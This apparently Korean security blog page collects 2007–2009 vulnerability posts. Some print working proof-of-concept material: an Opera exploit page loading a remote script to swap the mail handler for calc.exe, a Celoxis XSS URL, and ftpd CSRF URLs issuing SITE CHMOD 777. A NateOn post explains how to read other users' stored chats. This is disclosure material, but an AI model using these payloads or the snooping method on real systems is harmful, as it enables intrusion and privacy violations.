태터데스크 관리자

도움말
닫기
적용하기   첫페이지 만들기

태터데스크 메시지

저장하였습니다.

'┃ Application'에 해당되는 글 22건

  1. 2009.07.31 HTS(Home Trading System) 해킹
  2. 2009.07.15 Oracle 7월 긴급 패치(Criticla Patch)
  3. 2009.06.30 Microsoft 무료 AV - morro
  4. 2008.11.05 Adobe Reader/Acrobat 메모리 변조 취약점
  5. 2008.10.29 와이어샤크 취약점 발견
  6. 2008.10.27 Opera 웹브라우져 - 원격 코드 실행 취약점
  7. 2008.10.02 Celoxis 프로젝트 관리 소프트웨어 XSS 취약점
  8. 2008.09.29 multiple vendor ftpd - Cross-site 요청 위조하기
  9. 2008.09.29 MacAfee SafeBoot Device Encryption 평문 패스워드 노출
  10. 2008.09.27 wireshark 1.0.3 취약점 발견
  11. 2008.09.20 크롬 브라우져에서 비밀번호입력값 인증 버그
  12. 2007.11.28 네이트온 쪽지, 대화내용 보기(오프라인 상태)
  13. 2007.11.27 애플 퀵타임 제로데이 공격툴 릴리즈
  14. 2007.11.19 아이팟 터치 1.1.2 Jailbreak
  15. 2007.11.16 [본문스크랩] SBS MBC MS DRM 크랙 해제 하기
  16. 2007.11.13 Flash 어플리케이션 테스팅 - OWASP 2007
  17. 2007.11.03 아이폰(iPhone) 1.1.1 한방에 해킹
  18. 2007.11.01 곰 플레이어 보안 업데이트 출시
  19. 2007.10.24 RealPlayer playlist name stack buffer overflow
  20. 2007.10.12 adobe readerd 취약점의 실체
  21. 2007.10.07 엑셀2007 계산 오류 버그 & cisco장비 주소처리 버그
  22. 2007.10.03 웹 어플리케이션 해킹(Web Application Hacking)에 대비한 프로그램 코딩법

HTS(Home Trading System) 해킹

┃ Application 2009.07.31 11:58

HTS 해킹
[출처] HTS 해킹|작성자 iwillhackyou
http://blog.naver.com/iwillhackyou/110046959718


웬지 이걸 주제로 한 영화가 만들어지면 잼있을거같...아닌가??? ㅋ
Trackbacks 0 : Comments 0

Write a comment


Oracle 7월 긴급 패치(Criticla Patch)

┃ Application 2009.07.15 14:02
오라클에서 긴급패치를 발표했습니다. 30개의 취약점에 대한 업데이트네요.



Oracle has released its Critical Patch Update for July 2009 to address 30 vulnerabilities across several products.

This update contains the following security fixes:

  • 10 for the Oracle Database Server
  • 2 for Oracle Secure Backup
  • 2 for the Oracle Application Server
  • 5 for Oracle Applications
  • 2 for Oracle Enterprise Manager
  • 3 for the Oracle PeopleSoft and JDEdwards Suite
  • 1 for the Oracle Siebel Suite
  • 5 for the Oracle BEA Products Suite 

 

-------------------------------------------------------------------------------------------

Oracle Critical Patch Update Advisory - July 2009

 

 http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2009.html

-------------------------------------------------------------------------------------------

 

Trackbacks 0 : Comments 0

Write a comment


Microsoft 무료 AV - morro

┃ Application 2009.06.30 12:03



현재 마이크로소프트에서 자사 운영체제 윈도우에 기본 탑재(맞나?)할 무료 AV 프로그램인 morro를 개발 중에 있죠.

유출된 morro의 스샷을 볼 수 있습니다.

http://arstechnica.com/microsoft/news/2009/06/leaked-microsoft-security-essentials-codename-morro.ars

morro가 배포된다면 국내 무료 백신 프로그램들에게는 피해가 갈 것으로 보이네요.

또한 시간이 지나면 마이크로소프트의 엄청난!?? 네트워크를 통한 정보(샘플) 수집을 통해 좋아질 수 있을 거라고도 봅니다.
Trackbacks 0 : Comments 0

Write a comment


Adobe Reader/Acrobat 메모리 변조 취약점

┃ Application 2008.11.05 11:09

어도비 애플리케이션 pdf와 acrobat에서 다량의 취약점이 발견되었네요.



1. Adobe Acrobat/Reader "util.printf()" Buffer Overflow

[해당 소프트웨어]
Adobe Acrobat / Reader version 8.1.2

[취약점 설명]
Secunia Research는 Adobe Acrobat/Reader에서 취약점을 발견하였는데, 이는 악성 해커에 의해서 취약한 사용자의 시스템이 공격 당할 수 있습니다.

이 취약점은 "util.printf()"함수에서 부동 소수점 지정자(specifier)를 포함하는 포맷 스트링을 파싱 할때 boundary error로 인해서 발생하고, 변조된 PDF를 통한 스택 기반

버퍼 오버 플로우로 인해서 공격당할 수 있다.

이 공격이 성공하면 PDF파일을 볼 때 비정상 코드를 실행 할 수 있게 된다.

[해결방법]
vendor에서 11/04일에 패치를 발표하였다.




2. Adobe Reader Embedded Font Handling Out of Bounds Array Indexing Vulnerability

[설명]
어도비 리더에서 배열의 경계를 벗어난 접근 취약점을 이용한 원격 공격은 공격자가 현재 사용자로써 악성코드를 실행할 수 있도록 한다.

취약점은 특히 Type 1 fonts의 파싱을 담당하는 코드안에 존재한다. 메모리 영역을 할당한 후에 경계 체크를 수행하지 않는다. 그 후에 이 메모리의 접근은 악성 코드의 실행을 가져오는 악성 메모리의 변형으로 결과가 나타날 수 있다.

[분석]
이 취약점 공격은 원격 공격자가 현재 사용자권한으로 악성 코드를 실행할 수 있도록 한다. 이 취약점을 이용하기 위해, 공격자는 타겟 사용자가 악의적으로 생성한 파일을 열도록 확신해야만 한다. 또는 이메일에 첨부된 PDF파일이나 PDF파일이 포함된 웹사이트에 방문했을 때 파일들을 열도록 한다. 더이상 상호작용이 요구되지는 않는다. 문서의 thumbnail보기를 표시하는 익스플로러 확장 AcroRd32info 또한 취약하다. 이것은 PDF파일을 열어보지 않고서 단순히 클릭만 하여도 이용될 수 있는 취약점이다.

[탐지]
Adobe Reader version 8.1.1.

[대안]
효과적인 대응책은 없지만 브라우져에서 애플리케이션을 열지 않도록 설정하는 것은 웹기반 공격ㅢ 노출을 경감시켜 준다.
벤더에서 패치를 릴리즈 했다.

http://www.adobe.com/support/security/bulletins/apsb08-19.html




3. Adobe Acrobat And Reader AcroJS Heap Corruption Vulnerability

[설명]
Acrobat 프로페셔널과 Reader에서 힙 부정 취약점의 원격 공격이 공격자에게 현재 사용자 권한으로 악성코드를 실행할 수 있도록 해준다.

취약한 코드는 PDF문서의 스크립팅 코드 안에서 볼 수 있는 AcroJS 함수이다. 이 함수는 HTTP인증에 사용된다. 이 함수에 긴 문자열을 통과시킴으로써, 악성코드의 실행을 유발하는 방법으로 힙메모리를 변조할 가능성이 있다.

[분석]
이 취약점 공격은 공격자가 현재 사용자의 권한으로 악성코드를 실행할 수 있도록 해준다. 이 취약점을 이용하기 위해서, 공격자는 악의적으로 만든 파일을 타겟 사용자가 PDF가 포함되어진 웹사이트를 방문하거나 파일을 열도록 해야 한다. 만약 사용자가 어도비 리더 브라우져 플러그인을 활성화했다면, PDF파일이 브라우져에 표시될 것이다.

[탐지]
Acrobat Professional and Adobe Reader version 8.1.2. 이하

[대응]
어도비 리더나 어크로뱃의 자바스크립트를 비활성화하는 것으로 취약점 노출을 막을 수 있다. 자바스크립트가 비활성화 되면 어도비 리더는 사용자에게 문서의 몇몇 부분이 기능하지 않는다고 알린다. 그리고 그것을 활성화하기 위한 기회를 제공한다.
패치가 릴리즈 되었다.
http://www.adobe.com/support/security/bulletins/apsb08-19.html
Trackbacks 0 : Comments 0

Write a comment


와이어샤크 취약점 발견

┃ Application 2008.10.29 09:34


다수의 취약점이 와이어샤크에서 발견디었는데 악성패킷을 처리하는 동안 충돌 또는 종료를 유발한다고 합니다.

다음과 같은 문제점이 있다고 합니다.
- Bluetooth ACL dissector가 충돌하거나 중단됨
- Q.931 dissector가 충동하거나 중단됨
- Tamos Commview capture 파일들을 읽는 동안 중단됨
- USB dissector가 충돌하거나 중단됨.
- PRP와 MAE dissector가 와이어샤크 충돌을 유발함

와이어에 악성 패킷들을 주입하거나 악성 패킷 trace 파일을 읽도록 누군가를 유혹함으로써 와이어샤크 충돌을 유발할 가능성이 있다고 합니다.

Wireshark 1.0.4로 패치하시기 바랍니다.

참조 :
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4680
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4681
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4682
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4683
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4684
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4685
 http://www.wireshark.org/security/wnpa-sec-2008-06.html

Trackbacks 0 : Comments 0

Write a comment


Opera 웹브라우져 - 원격 코드 실행 취약점

┃ Application 2008.10.27 08:45

HTTP Proxy 변환 대신, 공격자는 "\\evil\malware.exe "나 로컬 명령으로 기본 외부 메일어플리케이션을 바꿀 수 있습니다.(예를 들면, 원격에서 악성 바이너리를 다운로드 하기 위해 사용될 수 있는 ftp.exe) “2”로 설정하여 “Mail Handler"를 바꾸면 오페라는 기본 오페라 메일 애플리케이션 대신 외부 메일 애플리케이션이 실행됩니다.

설정을 바꾼 후, 공격자는 간단하게 코드를 실행하기 위해 “mailto:”로 위치를 설정할 수 있습니다.

윈도우즈 계산기를 실행하는 소스를 다음 링크에서 찾을 수 있습니다.
http://raffon.net/research/opera/history/op.html

링크된 페이지로 가 소스코드를 보았더니 다음과 같습니다.
<html>
<title>bb</title>
<script>
var z=null;
function x() {
  window.setTimeout("z=window.open('opera:historysearch?q=%2A');window.focus();",1500);
  window.setTimeout("z.close();",3000);
  window.setTimeout("location.href='mailto:'",3000);
}
</script>
<body>
<a href="#<script src='
http://www.raffon.net/research/opera/history/o.js'></script>" target="_blank" onclick="x()">Click me...</a>
</body>
</html>



링크된 파일 o.js를 다운로드받아 들여다 보았더니 다음과 같았습니다.
s=document.createElement("IFRAME");
s.src="opera:config";
document.body.appendChild(s);
s.src="javascript:opera.setPreference('Mail','External Application','c:\\\\windows\\\\system32\\\\calc.exe');opera.setPreference('Mail','Handler','2');parent.window.close()";


위의 코드 실행으로 기본 메일 프로그램이 윈도우 계산기로 바뀌어 실행되는 것을 확인하였습니다.

최신 버전 9.61에서는 패치가 되었는지 되지 않네요.
Trackbacks 0 : Comments 0

Write a comment


Celoxis 프로젝트 관리 소프트웨어 XSS 취약점

┃ Application 2008.10.02 11:56

Celoxis는 기업이나 단체의 특별한 프로젝트, time sheets, 지출과 사업진행 등의 효율적인 관리와 협력을 향상시키기 위한 포괄적인 웹기반 프로젝트 관리자 툴이다.
문제는 이 소프트웨어가 URL에서 파라미터를 허락하고 파라미터의 내용을 보여주는 몇 개의 페이지들이 포함되어 있다. 이런 많은 파라미터들은 <script>를 포함하는 HTML태그들을 포함하고 그것들의 내용들이 대부분 걸러지지 않았다는 것이다.
이런 파라미터들은 엔드 유저에게 메세지를 보여주기 위해 소프트웨어에 의해 내부적으로 사용되는 것들이다. 이런 페이지들의 대부분은 오직 구독 간행물에서 접근이 가능하다.

하지만 다음 POC는 구독간행물 없이 접근될 수 있다.
http://asp1.celoxis.com/psa/user.do?bxn=umyhome&ni.smessage=XSS+goes+here+%3cscript%3ealert('XSS')%3c/script%3e

이 취약점은 사용자 인증없이 애플리케이션 안에서 임의의 객체를 조작하는데 사용될 수 있다. 객체는 프로젝트, 작업, 사용자, 기타 등을 포함한다. 이 취약점은 사용자가 그들 소유의 프로젝트를 삭제하도록 이용될 가능성이 있다.

2008-09-18: 초기 벤더에 알림Initial vendor notification
2008-09-18: 초기 벤더의 반응; 의심스러워했다.Initial vendor response; vendor disputed threat
2008-09-18: 벤더와 접촉
2008-09-23: 벤더와 접촉; 일주일 후에 공개
2008-09-30: 공개적으로 알려짐


: full-disclosure

Trackbacks 0 : Comments 0

Write a comment


multiple vendor ftpd - Cross-site 요청 위조하기

┃ Application 2008.09.29 17:11

<해당 소프트웨어>

이 문제는 4.3에서 발견되었습니다.

- - 해당 시스템:

       + OpenBSD

       + NetBSD

       + FreeBSD

       + some linux

- - 해당 애플리케이션:

       + proFTPd

       + others

 

- --- 0. 설명 ---

ftpd -- 인터넷 파일 전송 프로토콜 서버(Internet File Transfer Protocol server)

 

ftpd 유틸리티는 Internet File Transfer Protocol server 프로세스이다. 서버는 TCP 프로토콜을 사용하고 -P옵션이나 "ftp" 서비스 명세서에서 지정한 포트로 listen한다.

 

sidejacking이나 session riding과 CSRF나 XSRF처럼 원클릭 공격으로 알려진 Cross-site요청 위조는 인증되지 않은 명령이 웹사이트 신뢰권한을 사용자로부터 건네 받는 웹사이트의 악성 공격 기법이다.

특정 사이트에 대해 사용자가 가지고 있는 신뢰권한을 이용하는 cross-site scripting(XSS)와는 대조적으로, cross-site 요청 위조는 특정 사용자에 대해 사이트가 가지고 있는 신뢰권한을 이용한다.

 

- --- 1. ftpd bsd - Cross-site 요청 위조 ---

 

주요 문제는 소수의 다른 것들을 위해 긴 명령을 분할하는 데에 있다. 문제는 for(;;) 루프와 fgets()함수를 사용하는 사실에서 기인한다.

 

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

 

이 명령은 아래와 같이 분할된다.

 

500
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA': command
not understood.
500
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAA'

 

브라우져와 경로를 통해 ftp 데몬에 요청하는 명령이 512이상일 때, 우리의 URL은 분할된다.

 

/* FreeBSD 7.0 */

ftp://cxib@127.0.0.1///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////SYST

SYST 명령으로부터 결과를 돌려받는다.:

215 UNIX Type: L8 Version: BSD-199506

 

 

/* NetBSD 4.0 */

ftp://ftp.netbsd.org///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////SYST

SYST 명령으로부터 결과를 돌려받는다.:

215 UNIX Type: L8 Version: NetBSD-ftpd 20080609

위험해질 수 있는 경우는 이 버그가 CSRF 공격처럼 이용될 수 있다. 우리는 ftp 명령으로 파일의 권한이나 다른 조합을 바꾸기 위해 SITE CHMOD명령을 사용할 수 있다. 우리는 약간의 운이 필요할 뿐, 관리자는 공격당한 url를 실행할 것이다.

어떻게 이용하는가?

a. <img>태그로 몇 개의 html 파일을 생성하기

<img src="ftp://.....////SITE%20CHMOD%20777%20FILENAME">

..

b.

사용자를 대신하는 준비된 URL 입력

Example:

ftp://ftp.netbsd.org///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////SITE%20CHMOD%20777%20EXAMPLEFILE

위 예는 소유주가 이 URL을 사용할 때 EXAMPLEFILE로 권한을 바꿀 것이다.

 

- --- 2. 고치는 방법 ---

OpenBSD가 가장 먼저 통보했다. Fix는 cvs에서 구할 수 있다.

http://www.openbsd.org/cgi-bin/cvsweb/src/libexec/ftpd/ftpd.c

http://www.openbsd.org/cgi-bin/cvsweb/src/libexec/ftpd/extern.h

http://www.openbsd.org/cgi-bin/cvsweb/src/libexec/ftpd/ftpcmd.y

NetBSD:

http://cvsweb.netbsd.org/bsdweb.cgi/src/libexec/ftpd/ftpd.c

proFTPd:

http://bugs.proftpd.org/show_bug.cgi?id=3115

proFTPd:
http://bugs.proftpd.org/show_bug.cgi?id=3115

Trackbacks 0 : Comments 0

Write a comment


MacAfee SafeBoot Device Encryption 평문 패스워드 노출

┃ Application 2008.09.29 16:45
해당 소프트웨어는 MacAfee SafeBoot Device 암호화 v4, Build 4750 이하입니다.

 SafeBoot Device 암호화 루틴을 검사하는 패스워드가 패스워드를 읽은 후 BIOS 키보드 버퍼를 삭제하는 것이 실패합니다. 특권이 없는 로컬 사용자에게 평문 패스워드가 노출되는 결과를 가져 옵니다.

해당되지 않는 소프트웨어는 MacAfee SafeBoot Device Encryption v4, Build 4760 이상, MacAfee SafeBoot Device Encryption v5.x이므로 해결법은? 당연히 업데이트겠지요..:)
Trackbacks 0 : Comments 0

Write a comment


wireshark 1.0.3 취약점 발견

┃ Application 2008.09.27 12:58

와이어 샤크 1.0.3에서 몇가지 취약점이 발견 되었네요.

아래는 보고된 취약점입니다. 여기서 버퍼오버플로우 취약점은 리눅스에서는 위험하다고 생각이 드네요.

* Multiple buffer overflows in the NCP dissector (CVE-2008-3146).

* Infinite loop in the NCP dissector (CVE-2008-3932).

* Invalid read in the tvb_uncompress() function when processing zlib
   compressed data (CVE-2008-3933).

* Unspecified error when processing Textronix .rf5 files
   (CVE-2008-3934).


원격 공격자는 와이어샤크에 의해 모니터링 되고 있는 네트워크에 공격을 위해 특별히 만든 패킷들을 보내거나 악의적인 패킷 트레이스 파일을 읽도록 사용자들을 유혹함으로써 이런 취약점들을 공격할 수 있다고 합니다. 이는 DoS를 야기한다고 하네요.

해결법으로 최신버젼으로 업그레이드 하라는데 현재 최신버젼의 바로 하위버젼이 1.0.3인 걸로 봐서 이 소식을 접하지 않은 사용자들은 위험에 노출될 수 있겠네요.
Trackbacks 0 : Comments 0

Write a comment


크롬 브라우져에서 비밀번호입력값 인증 버그

┃ Application 2008.09.20 08:54

우연히 크롬을 이용해 어느 사이트에 회원가입을 하다가 깜짝 놀랐습니다.
국내 사이트들은 회원가입시 무수히 많은 정보를 입력해야 함을 모르시는 분은 없을겁니다.
헌데 아이디만 입력하면 바로 회원가입이 되는 시츄에이션을 겪었습니다.

이 말이 무엇이냐...비밀번호도 입력하지 않고 아이디만 입력한 상태에서 엔터를 쳤더니 회원가입이 된것입니다. 순간 이건 뭥미..ㅡㅡ;

IE로 바꾸어 회원가입을 시도햇더니 빈 칸에 대한 검증을 확실히 잘 합니다.

크롬에서 소스보기를 해보았더니
패스워드 값 인증 부분에서 4자이상을 쓰라는 조건문에서 오타가 있는 듯합니다.

 if(passwd.value >< 4){
 ....
}

이런식으로요...저건 확실히 오타로 보이는데...

IE에서 소스보기를 하니

 if(passwd.value < 4){
 ....
}

이렇게 멀쩡합니다.

제 부족한 지식으로는 이유를 모르겠네요.
혹시 이유를 아시는 분이 계시다면 아래 메일로 보내주시면 감사하겠습니다. :)

ydy0516@nate.com
Trackbacks 0 : Comments 0

Write a comment


네이트온 쪽지, 대화내용 보기(오프라인 상태)

┃ Application 2007.11.28 13:23

네이트온 쪽지, 대화내용 보기(오프라인 상태)

네이트온의 대화내용을 로그인을 통해야 사용 가능한통합메세지함이 아닌 오프라인 상태에서

볼 수 있게 해 주는 프로그램 입니다.

자신 뿐 아니라 타인의 쪽지, 대화내용을 확인할 수 있습니다.악용 소지가 있습니다. 소곤소곤 코멘트, 쪽지 등을 통해

삭제 요청이 5건 이상 들어올 경우 삭제하도록 하겠습니다~읽어보시고 가능하면 주위에 조심하라고 알려주시고

SK커뮤니케이션즈에 시정요청(암호화 등)을 해주세요.

타인이 자신의 쪽지, 대화 내용을 보지 않기를 원하신다면

chatdata, memodata 폴더를 삭제해 주시면 됩니다.

요약하면 3가지 방법이 있습니다.

1. SQLiteDatabase Browser이용

2.Nateon Memo, DB(chat) Viewer 이용

3.쪽지, 대화내용 폴더 직접 복사하여 확인하기

일단 아래의 3개의 프로그램을 다운받으세요.

1. SQLite Database Browserv1.3

2. Nateon Memo, DB(chat) Viewer

** 1) SQLite Database Browser를 이용하는 방법


네이트온의 쪽지 및 대화내용은오픈소스 데이터베이스 라이브러리인 SQLite(format 3)를 이용합니다.

(참고 : http://kldp.org/node/81635,Google-O'Reilly 2005 OpenSource Award winner, GoogleAndroid use it too)

SQLite.org에서 제공하는 이 프로그램을이용하면 SQLite를 이용한 DB를 탐색할 수 있습니다.

다운로드 링크에서도 보셨겠지만 실행 전 run.bat를 한 번 실행시켜 주세요. 다음부터는 다시 열지 않아도 됩니다.

이제 SQLite Database Browser를 실행시키고 File> Open Database 를 누르면 열기 창이 뜹니다.

[C 드라이브에 설치, 윈도우용 네이트온, 쪽지 및 대화내용이 존재할 경우] 찾아가야 할 주소는 다음과 같습니다.

C: Program files NATEON BIN 임의의난수 chatdata, memodata normal

임의의 난수는 예를 들면 이렇습니다. ex) 3519EC857F71E81D80A618AFF0B4C81F

이 임의의 난수 폴더에 들어가면 여러 폴더가 있는데 그 중 로그인한 사용자의 이메일 ID 주소가 있습니다.

사용자 동의 없이 로그인한 모든 사용자의 이메일 ID가 각각의 난수 폴더에저장되어 있습니다.

자신이 원하는 사용자임을 ID로 확인했다면chatdata, memodata normal 폴더로 가면 됩니다.

chatdata 폴더는 대화내용, memodata 폴더는 쪽지내용을 저장하고 있습니다.

아래는 어떤 파일을 열어야 하는지 폴더 내의 파일 구조를 보여주는 그림입니다.

주로 다루게 되는 파일은 CHATDATA 폴더의 경우 local_chat.db

MEMODATA 폴더의 경우 local_inbox.db, local_outbox.db 가 되겠죠~

난수 폴더 내의 favoritedata, maildata 로 메일내용 등을 확인할 수도 있고

chatdata, memodata action, mobile 등을 통해 액션쪽지, 휴대폰 문자내용 등을 확인할 수도 있습니다.

야래는 이 파일들을 열어 DB를 확인하는 모습입니다.

[대화내용]

BODYDATA 외에 NOREAD의 값을 통해 읽었는지의 여부(0이면 읽음, 1이면 읽지않음),

CONFIRM! 을 통해 해당 쪽지에 대해답장을 했는지의 여부(0이면 답장함, n이면 답장안함) 등을 알 수 있습니다.

SK커뮤니케이션즈는 2006년 3월에 출시한 네이트온 3.5 버전부터(현재 윈도우용 버전3.7) 보안을 위해 대화내용을 암호화 처리하고 있다고 주장하나, 위에 소개해 드린 방법을 써보시면 알겠지만 사실이 아닙니다. 마음만 먹으면 누구나 쉽게 남의 대화내용을 불순한 용도로도 확인할 수 있습니다. 또한, 그나마대화내용은 사용자에게 저장 여부를 묻지만 쪽지내용은 사용자에게 저장 여부를 묻지 않고 자동 저장되므로 악용소지가 상당히 큽니다. 뜻이있는 파코즌께선 SK커뮤니케이션즈에 시정요청(암호화 등의 방법을 이용)을 해주세요~

** 2) 직접 복사하여 확인하기

이 방법은 '통합 메세지함을 통하여' 자신 혹은 타인의 쪽지, 대화를 확인할 수 있습니다.

방법은 간단합니다. 위에서 해보신 분들은난수폴더 내에 chatdata, memodata 폴더가 핵심 폴더임을

알고 계실 것입니다. 이 두 폴더를 백업해 두었다가 자신이 로그인 하는 이메일 ID가 있는 난수폴더 내에

붙여넣기 하시면 됩니다. 그리고 네이트온을 들어가 통합메세지함을 확인하면 백업한 사용자의

쪽지 및 대화내용을 보실 수 있습니다.

다시 말하면, 원하는 사용자의 chatdata, memodata 폴더를 자신의 난수폴더에 복사하여 확인한다. 입니다~

** 3) Nateon Memo, DB Viewer 이용 - 가장 편리한 방법입니다.

설명은 제외하겠습니다~ 직접 사용해 보세요. 아주 쉽습니다.

저작권자 : ZEXTOR님. http://zextor.tistory.com/

[대화내용 - Nateon DB Viewer]

악용하지 마시고 자신의 정보를 노출 시키지 않는 지식 정보로 활용하세요.. 꼭 악용하는 분들이 만으시네요

출저 : http://www.parkoz.com

Trackbacks 0 : Comments 0

Write a comment


애플 퀵타임 제로데이 공격툴 릴리즈

┃ Application 2007.11.27 19:01

출처 : http://swbae.egloos.com/1673391

애플 퀵타임 제로데이 공격툴 릴리즈

얼마전 애플 퀵타임 제품의 다양한 취약점이 발표되었는데요, 이중 RTSP 헤더 처리에 대한 취약점을 공격하는 제로 데이 공격 툴이 릴리즈 되었습니다. 더구나 이번에 릴리즈된 도구는 인터넷 익스플로러, 파이어폭스, 오페라 등에 유니버설하게 먹히는 도구라 그 파장이 클 듯 합니다.

보시다시피 해당 취약점은 아직 애플 사의 패치가 나오지 않은 제로데이 취약점으로, 해커가 미리 준비해놓은 웹 사이트를 방문하는 순간 피해를 입게 되어 있습니다. 해당 취약점에 대해 시큐니아(Secunia)는 최고 위험 등급인 'Extremely Critical' 등급을 매겼습니다.

막 릴리즈된 유니버설 공격 도구 입니다.

CERT 에서는 해당 취약점에 대한 다양한 대처 방안을 제시하고 있습니다.
http://www.kb.cert.org/vuls/id/659761

대표적으로
1. RTSP 프로토콜을 방화벽 레벨에서 차단하는 방법
2. 퀵타임 ActiveX 에 대해 kill-bit 을 적용하는 방법 (일반 사용자들은 이 방법을 사용하는 것이 바람직할 듯)
을 들 수 있겠는데, 여러분은 레지스트리 에디터를 열어

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerActiveX Compatibility{02BF25D5-8C17-4B23-BC80-D3488ABDDC6B}]
"Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerActiveX Compatibility{4063BE15-3B08-470D-A0D5-B37161CFFD69}]
"Compatibility Flags"=dword:00000400

항목을 적용하시거나, 위의 내용을 QuickTime.reg 라고 저장한 후 탐색기에서 더블클릭해 적용해주시면 되겠습니다.

NeXTStep 사용해보신 분들은 아시겠지만, 애플 사는 전통적으로 보안에 대해 무관심한 회사 중 하나입니다. 퀵타임 취약점이얼마나 자주발표되는지만 보아도, 애플의 보안에 대한 태도를 알 수 있죠. 요새 iPod 가 인기를 끌면서 iTunes 와 퀵타임을 사용하시는 분들이 많으실텐데, 신속히 조치하셔서 피해를 미연에 방지하시기 바랍니다.

Trackbacks 0 : Comments 0

Write a comment


아이팟 터치 1.1.2 Jailbreak

┃ Application 2007.11.19 19:50
아이팟 터치 1.1.2 Jailbreak
'방법'에 대한 영문 소개
(http://www.albireo.net/powerbook/forum/showpost.php?p=29158&postcount=12)


간단하게 말하면, 아직까지는 1.1.2에서 한방으로 jailbreak하는 방법은 만들어지지 않았고, 1.1.1에서 먼저 jailbreak을 성공시키고 난 다음에 1.1.2로 업글하고, 그 다음에 다시 jailbreak를 하는 것입니다.

영문 설명서 및 해킹 방법 안내서에서는 아이폰까지 염두를 하다보니 말이 주저리 주저리 많더군요. 아이팟 터치, 윈도우 환경?기준으로만 설명하겠습니다.


1.고수들을 위한 간단한 안내입니다.

